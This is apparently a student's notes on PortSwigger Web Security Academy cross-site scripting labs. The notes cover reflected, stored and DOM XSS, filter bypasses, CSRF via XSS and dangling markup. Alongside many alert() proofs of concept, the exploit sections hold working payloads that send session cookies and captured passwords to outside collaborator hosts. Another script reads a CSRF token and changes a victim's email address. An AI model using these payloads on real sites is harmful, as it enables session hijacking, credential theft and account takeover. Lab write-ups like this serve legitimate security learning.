# Basic Concept
The XSS Attack involves deliver malicious payload to victim's browser.
Let Victim to execute js and leak the sensitive info to us.
iframe not allow call alter() (2021)
# Identify XSS vulnerability
## Automatic Tools
- xsstrike
- Burp Suite Scanner
## Manual
1. Test Every entry point:
login page ?
query pages?
comment ?
2. Positions
URL parameter?
Post Request?
HTTP Header?
3. Determine the XSS context:
Between HTML tags?
HTML Attribute?
4. Testing Xss payload
# XSS type
## Reflected - XSS
This type of XSS occurs when a website receives data from an HTTP request and immediately reflects that data in the response.
## Store-XSS
Store-XSS, also known as persistent XSS
Positions:
- user comment...
- Chat room nicknames,
- Customer order contact details.
- Webmail application "display" message received over SMTP
- a Marking application "display" the social media post
- Network monitor application "display" packet data from the network
### Testing Way
When manually testing Store XSS, we have to find out the "entry point" and "exit point"
Entry point:Attacker-controllable data can enter the application's processing.
Exit point:data might appear in the application's responses.
## DOM-Base XSS
### Window Basic Concept
`window` is the main JavaScript object root, aka the `global object` in a browser.
Web Page Generate!
Iframe -> embedding document in windows
### Vulnerable code
-> Source Controllable
```htmlembedded
#Reflect XSS
#innerHTML
#http://127.0.0.1:5500/XSS/DOMXSS/vulnCode/innerHtml.html?search=%3CDEtAiLS%09oNPOiNTerenTeR%0A=%0Aa=prompt,a()%0Dx%3E3nd
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<title>Document</title>
</head>
<body>
<p id="results"></p>
<script>
const urlParams = new URLSearchParams(window.location.search);
const search = urlParams.get('search');
const results = document.getElementById('results');
results.innerHTML = 'You searched for: ' + search; //Danger Sink
</script>
</body>
</html>
```
## Identify
Tow way to find vulnerability
- DOM invader (Build-in Burp suite browser)
- Developer Tools
We need to check any controllable source and tract it how to pass into the danger sink
windows.location
## Controllable Source
### URL (location)
```
window.location.search
location.serach
location.hash
```
## Danger Sinks
https://portswigger.net/web-security/cross-site-scripting/dom-based#which-sinks-can-lead-to-dom-xss-vulnerabilities
```
document.write()
document.writeln()
document.domain
element.innerHTML
element.outerHTML
element.insertAdjacentHTML
element.onevent
```
Notice: ->element.innerHTML not allow svg,script
### Using DOM Invader to find out DOM-XSS
#### Injecting a Canary
DOM invader will automatically to parse the DOM to find out we injection specific string called 'canary'
Manual injecting
Inject the canary manually into any input field we want to test.
Exploiting
```
?search=<img%20src%20onerror=alert(1)>
```
Automatically
Notice: Injecting canary to all the page perhaps cause the web crash, When we testing the online wesite, we should test one source at a time.
- Outer HTML: The HTML element surrounding the canary.
- Frame Path: The frame in which the canary is passed to the sink.
- Event: The JavaScript event triggered when the canary is passed to the sink.
#### Study the Vulnerable Code
Trace the source and click the Stack trace link for further analysis.
### LAB2-DOM-XSS Source: window.location.search / Sink: wdocument.write sink
#### Find out interest request
The application reflects user input immediately
#### Analysis Dynamic Response
Look up Source Code
Vulnerable Code:
```javascript
<script>
function trackSearch(query) {
document.write('<img src="/resources/images/tracker.gif?searchTerms='+query+'">');
}
var query = (new URLSearchParams(window.location.search)).get('search');
if(query) {
trackSearch(query);
}
</script>
```
#### Identify
Upon Analysis, we found
Now, we have to analysis the context of reflected query and try to close img tag to inject XSS payload
XSS Payload
```
meow"><svg onload="alert(1)
```
Solved !
### LAB3 DOM-XSS Source: window.location.search / Sink: document.write
### Analysis Attack surface
In the site map, we see the the `stockCheck.js`.
Danger Sink and Source found:
Source
```javascript
var store = (new URLSearchParams(window.location.search)).get('storeId');
document.write('<select name="storeId">');
if(store) {
document.write('<option selected>'+store+'</option>');
}
```
Analysis the source
### Identify
We found the source being passed between `<tag1><tag>source</tag></tag1>`. We need to close the tags to inject HTML and trigger the XSS.
```
?productId=1&storeId=</options>meow
```
```
/product?productId=1&storeId=</options></select>meow<svg%20onload=alert(1)>
```
Solved !!
## LAB-DOM XSS in innerHTML sink using source location.search
### Mapping Structure
### Analysis Attack Surface
### Identify
The website reflected our input .
```
/?search=<svg onload=alert(1)>
```
Solved
## Source and Sink in third-part dependencies
### DOM XSS in jQuery
jQuery is a JavaScript library; it can easily modify the Document tag or attribute.
Vulnerable Code
```
$(function() {
$('#backLink').attr("href",(new URLSearchParams(window.location.search)).get('returnUrl'));
});
```
`attr()` function can modify the specific attribute value.
The `href` value is assigned by a URL parameter; it can easily inject the payload to trigger the XSS.
```
/returnUrl=javascript:alert(document.domain)
```
## LAB-DOM XSS in jQuery anchor href attribute sink Using the search.location source
### Mapping structure
### Analysis attack surface
### Identify
Solved !!
DOM Invader
---
### jQuery Selector
The `$()` selector function is another potential dangerous sink; it can be used to inject malicious objects by the attacker
For Example
```javascript=
$(window).on('hashchange', function() {
var element = $(location.hash);
element[0].scrollIntoView();
});
```
Attackers can utilize an iframe to trigger the hash event to exploit this vulnerability.
PoC
```htmlembedded=
<iframe src="https://vulnerable.com#" onload="this.src+='<img src=x onerror=print()>'"></iframe>
```
## LAB-DOM XSS in jQuery selector sink using a hash event
### Mapping Structure
### Analysis Attack Surface
No useful information was found in Target Analysis Tools. We have to manually search for vulnerabilities.
### Identify
Website's behavior:
When we go back to the previous page, it automatically anchors to the previous location
We could guess there is some program to implement this functionality. We found vulnerable jQuery code implementing this functionality as follows:
```javascript
<script>
$(window).on('hashchange', function(){
var post = $('section.blog-list h2:contains(' + decodeURIComponent(window.location.hash.slice(1)) + ')');
if (post) post.get(0).scrollIntoView();
});
</script>
```
Testing
Reflected & DOM - XSS
Deliver to Victime or embedding to other website which allow us to insert the iframe
payloads
```htmlembedded=
<iframe src="https://0a48001f03d228fa8087da4300da0056.web-security-academy.net/#" onload="this.src+='<img src=meow onerror=print()>'">
```
Solved!
---
## DOM XSS in angular JS
AngularJS allows websites to execute JavaScript without angle brackets or events. When the HTML element has the `ng-app` attribute, it will be processed by AngularJS.
PoC paylaod
```
{{$on.constructor('alert(1)')()}}
```
## LAB-XSS in AngularJS expression with angle bracket and double quote HTML-Encoding.
### Mapping Structure
### Analysis Attack Surface
### Identify
PoC
```
{{$on.constructor('alert(1)')()}}
```
## Reflected DOM XSS
Pure DOM XSS vulnerable are self-contain within a single page.
However, website also process data from the http request and pass into the DOM sing, lead to Refleted DOM XSS
For instance, the form process the reflected data in unsafely way, ultimately write it to danger sink.
Vulnerable Code
```
eval('var data = "reflected string"');
```
## LAB-Reflected DOM XSS
### Mapping target
### Analysis attack surface
Finding interested request
Brows those Dynamic URLs via browser and
Send those request to Repeater
Interested behavior.
### Identify
According we previous investigation.
we could audit how the website to display search's response
Audit the `/?search=360783` page
we found / page import the searchResult.js
path -> search-result
---
Sink
```
eval('var searchResultsObj = ' + this.responseText);
```
we could exploit eval function on local testing as following payload
```
eval('var jsonOBJ='+""-alert(1));
```
---
Escape Json filter and deal with json format
if we input ", josn will attempt escape double quote using backslash(/)
we can add second / to bypass JSON filter to close searchTerm value and using subtraction operator to separate the expression before we call our injected JS
Finally, Using curly bracket to close the json object and two forward slashed comment out rest of object.
paylaod
```
\"-alert("meow")}//
```
Solved!!
## Stored DOM XSS
website may also to store the data that we could control on server, when other page have to retrieve the data and using to script to display information in unsafe way
, it could lead to Stored DOM XSS
### LAB-Stored DOM XSS
#### Mapping target
#### Analysis Attack surface
Finding interest request
Interest javascript -> we find the controllable source, next we have to attempt to find the Sink
#### Identify
Analysis Post command functionality
Stored DOM XSS in commend
```
<><img src=meow onerror=alert(1)>
```
Passing SOurce to sink
Trigger arbitrary js
Solved!!
## Command DOM-XSS Danger Sink!
The following are some of the main sinks that can lead to DOM-XSS vulnerabilities:
`document.write() document.writeln() document.domain element.innerHTML element.outerHTML element.insertAdjacentHTML element.onevent`
The following jQuery functions are also sinks that can lead to DOM-XSS vulnerabilities:
`add() after() append() animate() insertAfter() insertBefore() before() html() prepend() replaceAll() replaceWith() wrap() wrapInner() wrapAll() has() constructor() init() index() jQuery.parseHTML() $.parseHTML()`
# XSS Context
It's essential to identify where our controllable data appears location where are appears.
Check whether there is any validation or pre-processing with data perform by the application.
Cheat Sheet:
https://portswigger.net/web-security/cross-site-scripting/cheat-sheet
## Between HTML tages
IF the source located between HTML tags, we can insert HTML tag or script to trigger XSS.
PoC
```
<script>alert(document.domain)</script>
<img src=1 onerror=alert(1)>
```
### WAF (Web Application Firewall)
Web application firewall
### LAB-Reflected XSS into HTML context with most tags and attribute blocked
#### Mapping target
#### Analysis Attack Surface
Finding Interest request
It reflects our input between the `<h1>` tags.
#### Identify
Attempting inject the PoC payload
```
<img src=x onerror=alert(1)>
```
However, it is filtered by the WAF, we could fuzzing it determine whether the rule is a whitelist or blacklist And try to bypass it.
#### Fuzzing Tags
We discover the `<body>` tag is allowed
Next, We attempt to injected this payload
```
<body onload=alert>
```
According the error response, we need to find the valid attribute in the same way.
#### Fuzzing valid attribute
payload
```
?search=<body+onresize%3dprint()>
<body onresize=print()>
```
We have to write some code to let user trigger the onresize attribute.
#### Trigger onresize attribute by Frame
```html
<iframe src="https://0af400c104ed4fd780a9767f008c002c.web-security-academy.net/?search=%22%3E%3Cbody%20onresize=print()%3E" onload=this.style.width='100px'>
```
Solved!!
### LAB-Reflected XSS into HTML context with all tags block except customer one
#### Analysis Attack surface
Evaluated user input
Tag are not allowed !
It allow use non-standard tags
#### tabIndex attributed
```htmlembedded
<div id =meow tabindex="1">
<p>This is the first focusable element.</p>
</div>
```
The `tabindex` attribute support the focus functionality.
When we access `http://website.com#meow` to focus the ID value of the element is meow
and it will be auto-focused. We could exploit the `onfocus` attribute to trigger JavaScript events.
we could testing
```
<meowtag id=focusmeow onfocus=alert(1) tabindex="1">
```
```
?search=<meowtag id=focusmeow onfocus=alert(1) tabindex=1>#focusmeow
```
```htmlembedded
<script>
location="https://0a7400780492b48b804308d300cd0073.web-security-academy.net/?search=<meowtag id=focusmeow onfocus=alert(document.cookie) tabindex=1>#focusmeow";
</script>
```
Solved !!
### LAB-Reflected with event handler href attributed was blocked
#### Mapping target
#### Analysis Attack surface
Finding interested request
Evaluated user input
#### Identify
Testing
```
<img src=x onerror=alert(1)>
```
```
<meow>
```
Base on the result, we can infer that website use whitelist to filter tag
#### Fuzzing Tags
```
<svg onload=alert(1)>
```
The `onload` attribute didn't allow.
#### Fuzzing Event
All triggered JavaScript events are blocked.
The "a" tag's href attribute is also blocked.
#### Survey Animate Element Document
```
<svg width="100" height="100" xmlns="http://www.w3.org/2000/svg">
<a href="meow">
<animate attributeName="href" values="javascript:alert('Hello!')" dur="1s" repeatCount="1" />
<text x="10" y="40">Click me</text>
</a>
</svg>
```
We could remove the href and some unnecessary elements to trigger XSS.
```
<svg>
<a>
<animate attributeName="href" values="javascript:alert('Hello!')" />
<text x="10" y="40">Click me</text>
</a>
</svg>
```
```
<svg><a><animate attributeName="href" values="javascript:alert('Hello!')" /><text x="10" y="40">Click me</text></a></svg>
```
Solved
### LAB Reflect XSS with some SVG markup allowed
```
?search=<svg onload=alert(1)>
```
```
?search=<img+src%3dx+onerror%3dalert(1)>
```
Tags are not allowed.
#### Fuzzing Tags
#### Fuzzing Event
#### Survey animateTransform
```htmlembedded
<svg width="200" height="200" xmlns="http://www.w3.org/2000/svg">
<rect width="50" height="50" fill="blue">
<animateTransform
attributeName="transform"
attributeType="XML"
type="rotate"
dur="2s"
values="0;360"
repeatCount="indefinite"
onbegin=alert(1)
/>
</rect>
</svg>
```
Removing didn't require element and attribute to avoid being filtered by WAF.
```htmlembedded=
<svg>
<animateTransform
onbegin=alert(1)
/>
</svg>
```
```
<svg ><animateTransform onbegin=alert(1)></svg>
```
Solved !!
## In the HTML Attribute Value
Sometime, it's possible to terminate the element by `">`, but More commonly, the angle bracket will be blocked or encode by the filter.
If the element allow us to terminal the value with `"` we could append a new event listener to trigger XSS as the following code.
```htmlembedded
" autofocus onfocus=alert(1) close="meow
```
FireFox Not Work
Chrome Work
### Lab Reflected XSS into attribute with angle bracket HTML Encoding
### Mapping target
### Analysis Attack surface
#### ?/search=p1
### Identify
```
/?search=" autofocus onfocus=alert(1) x="x
```
Solved !!
---
### Double quote HTML-encoded
javascript:alert(1)
Using
```
<a href="javascript:alert(document.domain)">
```
### LAB-Stored XSS into href attribute anchor with double quote HTML-encoded
#### Mapping target
#### Analysis Attack Surface
/post/command
#### Identity
```
javascript:alert(1)
```
Solved
---
```
<input type="hidden" accesskey="x" onclick="alert(1)">
```
```
<link rel="canonical" accesskey="x" onclick="alert(1)" />
```
### LAB-Reflected XSS in link tag
```
<img src=x onerror=alert(1)>
```
#### Identify
```
/?'x='1
```
payload
```
/?'accesskey='x'onclick='alert(1)
```
(Didn't have space in the payload)
Solved !!
---
## XSS in javascript
when our controllable source exists in the javascript block, we can attempt to terminate current javascript block and inject own payload.
### Terminating Current Script
The commonly way using `</script>` to terminate the javascript block.
For example
```
<script>
...
var name = 'user controlable data'
...
...
</script>
```
In this situation, we attempt inject the `</script>` tag and insert html tag to trigger the XSS as shown below
```
</script><svg onload=alert(1)>
```
This attack work because the browser will parse the the Document element to identity the page element including block of script, and next action will parse the javascrip.
### LAB Reflect XSS in the javascript string with single quote and backslash escape
#### Mapping The Target
#### Analysis Attack surface
/?research
There are two Xss context we could try
#### Identity
try
`<svg onload=alert(1)>`
Between with HTML tags
Script variable didn't proper sensitize
Attempt to terminal the script and injection the html payload to trigger XSS
Payload
`</script><svg onload=alert(1)>`
Solved !!
---
### Breaking out of javaScript string
In some situation, the XSS context may be inside the a quoted string, we could use some technique to break out of the string and executing the javaScrip.
==Note++
It's essential to repairing the script, since our injected payload may otherwise cause the to fail due to the (Syntax Error)
Payload
- -> separate the sting and javascript Expression.
```
//Using the single qutoes
meow'-alert(document.cookie)-'
or
//Using the double qutoes
meow"-alert(document.cookie)-"
meow'<Repare Syntax>;alert(document.domain)//
```
### LAB Reflected XSS into javascript with angle bracket HTML encoding.
#### Mapping Structure
#### Analysis Attack surface
/post?postId=2
/?search=?
/resources/images/tracker.gif?searchTerms=171171
#### Identify
==/?search=?==
```
sting</scirpt>
```
```
?search=171171';alert(1);//
```
```
?search=171171'-alert(1)-'meow
```
Solved !!
---
### Bypass Backslash Escaping
Some application will prevent single quote or double quote from breaking out string with backslash escaping as flowing.
```
\';alert(document.domain)//
```
we could add \ to bypass it
```
\\';alert(document.domain)//
```
### LAB-Reflected XSS into javascript string with angle bracket and double quotes HTML encoding and single quote escaped
#### Mapping target
#### Analysis attack surface
Potential injected point!
```
GET /post?postId=5
GET /?search=227860
GET /resources/images/tracker.gif?searchTerms=227860
```
#### Identity
Attempt
```
<svg onlaod=alert(1)>
```
we could know we didn't use angle bracket to test
we could try using single quote to close string and trigger XSS
```
?search=227860';alert(1)//
```
we could attempting as following payload
```
/?search=227860\';alert(1)//
```
or
```
/?search=227860\'-alert(1);//
```
It look like success !
### Bypass WAF or filter Using `throw`
throw statement allow us didn't use the parentheses to call the function and pass value.As the following
```
onerror=alert;throw 1
```
```
<img src=x onerror=alert;throw 1>
or
<script>onerror=alert;throw 1</script>
```
More technique detail
https://portswigger.net/research/xss-without-parentheses-and-semi-colons
### LAB Reflected XSS in javascript URL with some character blocked.
#### Mapping target
#### Analysis attack surface
`POST /post/comment`
Skip
----
### HTML encoding by pass
When the XSS context exists in html tag with js Event handler, It's possible to use html encoding to bypass the input filter.
XSS-Work Reason
Browser will decoding the html tag attribute value in response, when it perform javascript Event
' -> '
" -> "
vulnerable code
```htmlembedded
<a href="" onclick="var name = '123'-alert(1);//''">moew</a>
```
HTML automatically HTML decoding event attribute vale to ensuring the javascript work correctly.
Exploiting this mechanism allow bypassing input filter HAHA.
==Note==
This technique doesn't work on regular HTML attributes.
### LAB-Store XSS into onclick event with angle bracket and double quotes HTML-encoding and single quote and backslash escaped
#### Mapping The Target
Auto Scan (Crawl) -> GET
Manual Testing -> POST
#### Analysis Attack Surface
Envaluate user INput (Comment functionality)
Comment parameter
#### Identify XSS
Between the HTML tags
```
<svg onload=alert(1)>
```
In a javacript string
Testing
```
123'-alert(1)-'
```
Bypass backslash
```
meow\'-alert(1)-\'
```
The controllable source context is in the javascript event we could encode the single quote using HTML encoding to bypassing the input sanitized.
HTML-encoding
```
'-alert(1)' //work
or
'-alert(1)-' //work
```
URL-encoding
```
http%3A123%26apos%3B-alert%281%29-%26apos%3B
```
Solved !!
---
### XSS in javascript template literal
javscript template allow us embeded the javaScript expressions in string using backticks (`). Here's an example:
```javascript
<p id =meow></p>
<script>
var name = "meowhecker" //if the name is controllabled
document.getElementById('meow').innerHTML= `I am ${name}`
</script>
```
```htmlembedded
<p id =meow></p>
<script>
var name = '123'-alert(1)-'' //if the name is controllabled
var geeting = `I am ${name}`
document.getElementById('meow').innerHTML= geeting
</script>
```
### LAB Reflected-XSS into javascript template literal with angle bracket, single quote, double quote, backslash and bracket Unicode-escaped.
#### Mapping Target
#### Analysis Attack Surface
Evaluated user input
#### Identify
Context: In JavaScript template literal
```
${alert(1)}
```
Solved !!
### Client Side Template injection
(skip)
---
# Exploit-XSS
```
alert(document.domain)
printer()
prompt()
```
Those payload just a PoC, Proving allow us to arbitrary execute javascript
Now, we have to prove that XSS is a high threat by fully exploit
## Steal Cookie
We could through fetch function make the victim send request with cookie to us.
But, there are some limitations.
- Victim not login in
- Website have HttpOnly Setting
- Session might be block by addiction factor like the user'IP address
- The session might timeout
## Lab-Exploiting XSS to steal cookie
### Mapping Target
- Crawl Scanning
- Manual testing post functionality
### Analysis Attack Surface
Analysis Issue
Evaluate User input
### Identify XSS
Between HTML tags
```
<svg onload=alert(document.domain)>
or
<svg onload=alert(document.cookie)>
```
Testing -> Comment
Testing -> Email prefix
### Exploit
```javascript
fetch('https://izlpiklnyzy19pmky18wsf0yspygm7aw.oastify.com', {
method: 'POST',
mode: 'no-cors',
body:document.cookie
});
```
or
```htmlembedded
<svg onload="fetch('https://k7srqmtp6163hrum63gy0h800r6iuaiz.oastify.com', {method: 'POST',mode: 'no-cors',body: document.cookie});"></svg>
```
==Note==
We need to adding single quote or double quote prevent syntax Error, if we use html tag to exploit it.
#### Testing as own account
#### Waiting Administrator
Solved !!!
## XSS Capture password.
If you allow your browser to remember passwords,we could easily use script to extract the username and password through javascript.
This technique require to the victim clicks the "Save Password" button, the next time they login in, the browser will automatically fill the username and password.
e.g.
```htmlembedded=
<form method="post">
<input type="text" name="username">
<input type="password" name="password">
<input type="submit" onclick="document.getElementById('victimPassword').innerHTML=password.value" value="click">
</form>
<p id="victimUserName"></p>
<p id="victimPassword"></p>
```
```htmlembedded
<input id="username" type="text" name="username">
<input type="password" name="password" onchange="passwordExistis(username.value,this.value)">
<p id="victimUserName"></p>
<p id="victimPassword"></p>
<script>
function passwordExistis(username,password){
document.getElementById('victimUserName').innerHTML=username
document.getElementById('victimPassword').innerHTML=password
}
</script>
```
```htmlembedded
<input id="username" type="text" name="username">
<input type="password" name="password" onchange="userPass(username.value,this.value)">
<script>
function userPass(username,password){
fetch("https://hzkoijlmyyy09omjy08vse0xsoyfm8ax.oastify.com", {
method: "POST",
mode: "no-cors",
body: username,password
})
}
</script>
```
## LAB-Exploiting cross-site scripting to capture passwords
This XSS vulnerability is similar to previous lab, so I'll skip documenting the steps to identify XSS.
Exploit
```htmlembedded=
<!-- Works successfully -->
<input id="username" type="text" name="username">
<input type="password" name="password" onchange="userPass(username.value,this.value)">
<script>
function userPass(username,password){
fetch("https://hzkoijlmyyy09omjy08vse0xsoyfm8ax.oastify.com", {
method: "POST",
mode: "no-cors",
body: username+':'+password
})
}
</script>
<!-- Alternatively -->
<input name=username id=username>
<input type=password name=password onchange="if(this.value.length)fetch('https://BURP-COLLABORATOR-SUBDOMAIN',{
method:'POST',
mode: 'no-cors',
body:username.value+':'+this.value
});">
```
Solved !!
## Exploiting cross-site scripting to perform CSRF
XSS allow attacker to manipulate Normal use into perform specific action such as.
- Making victim to send a message
- Making the victim commit a backdoor to a source code repository.
- Making the victim transfer their Bitcoin.
Some website don't require the password to change the email address, this present the an opportunity for exploitation, we can change victim email to one that we can control, and then trigger password rest to gain access victims account.
Those exploitation under the the category of CSRF. CSRF can occur as a standalone vulnerability be exploit by using fishing HTML page, However, it can be mitigated through the use of anti-CSRF tokens
If a website has an XSS vulnerability, it becomes possible to bypass the CSRF token
## LAB-Exploiting XSS Perform CSRF
### Mapping the target
### Analysis Attack surface
Functionality Design Fault
Users can update their email without requiring a password.
Evaluated User Input
GET /post?postId=5
### Identify
Determine whether updating the email is vulnerable to a CSRF attack.
It has anti-CSRF token, We can attempt to find XSS to extract the token and bypass this protection.
Finding XSS
The comment functionality allows us to execute arbitrary JavaScript.
#### Exploit
We can write code using XSS to bypass the CSRF token. We need two requests: the first to retrieve the token and the next to modify the email address to one we control.
```htmlembedded
<script>
var req = new XMLHttpRequest();
req.onload = handleResponse;
req.open('get','/my-account',true);
req.send();
function handleResponse() {
var token = this.responseText.match(/name="csrf" value="(\w+)"/)[1];
var changeReq = new XMLHttpRequest();
changeReq.open('post', '/my-account/change-email', true);
changeReq.send('csrf='+token+'&email=test@test.com')
};
</script>
```
# Dangling mark up Attack
Dangling markup attack allow us to retrieve the sensitive data in page
Example
```
<input type="text" name="input" value="user can controll"
```
If the browse didn't filter `>"`, normally we attempt perform XSS testing, Suppose the application has CSP protection, it's impossible to perform XSS.
But we could inject Dangling `img` tag to gain context after to `src` attribute as the following payload
```
"><img scr='//meowhecker.com?
```
## LAB-Reflected XSS protected by very strict CSP, with dangling attack.
### Mapping Target
Auto Curl and Manual Curl
### Analysis Attack Surface
Evaluated User Input
Flaw-design
Endpoint: /my-account
### Identify Vuln
It's possible
Using CSRF to modify the email to reset the password.
We have a XSS to grep the csrf token
Identify Reflected XSS
==context in the HTML Attribute==
Payload
```
meow"><svg onload="print()
```
XSS not work (maybe have CSP)
Using dangling technique to gain CSRF token
```
meow"><img src=//ydfaxb1mr2u2paifa6ydzqgrdij971vq.oastify.com?
```
Fail (Chrome IN-build protect mechanism)
It have scp
### Exploit Vuln
Image() src
this object can be use to manipulate application to interact with our C2 server
```
<script>
var asyncImg = new Image()
asyncImg.src='https://hackmd.io/_uploads/rJe4TizLp.png'
asyncImg.onload = function(){
console.log('Async request successful');
}
</script>
```
`<base taget="_blank">`
base tag be sued to setting default configuration
target attribute can let `a` tag to choice the which action browser to do
e.g.
`_blank` new windows
we could use window.name to get target value such as
```htmlembedded
<a href="http://127.0.0.1">click</a><base target="meowhecker">
```
```
<a href="http://exploit-0a5200dd03196146803e6b9c01ee0068.exploit-server.net">Click me<base target='
```
```htmlembedded=
<script>
if (window.name){
new Image().src='//w2z8m9qkg0j0e87dz4nboo5p2g87w1kq.oastify.com?'+encodeURIComponent(window.name);
}else{
location='https://0af1008d0341618c808c6c4f00330086.web-security-academy.net/my-account?email="><a+href%3d"https%3a//exploit-0a5200dd03196146803e6b9c01ee0068.exploit-server.net/exploit">Click+Me</a><base+target%3d%27'
}
</script>
```
Local Account Testing Success
Send to victim
```
<script>
if(window.name) {
new Image().src='//wnn879bk1040z8sdk48b9oqpngt7h25r.oastify.com?'+encodeURIComponent(window.name);
} else {
location = 'https://0af1008d0341618c808c6c4f00330086.web-security-academy.net/my-account?email="><a+href%3d"https%3a//exploit-0a5200dd03196146803e6b9c01ee0068.exploit-server.net/exploit%22%3EClick%20me%3C/a%3E%3Cbase%20target=%27';
}
</script>
```
(skip)
###
# CSP
## Impact
- Impersonate or masquerade as the victim user.
- Read any Data that use is able to access
- Capture the user login credential
- inject trojan functionality into the website
XSS impact is dependent on the what application functionality can be exploit.
## Content security policy(CSP
Some website will employ CSP to mitigate the exploitation of the vulnerability, In Fact, have many way to circumvent this mechanism.
Sign in with Wallet
Connect another wallet